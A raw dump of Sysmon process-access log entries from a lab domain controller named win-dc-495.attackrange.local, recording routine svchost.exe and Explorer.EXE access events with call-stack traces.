13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.492{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce
0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.492{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.445{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.398{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+baba5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.398{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+baba5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:33.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 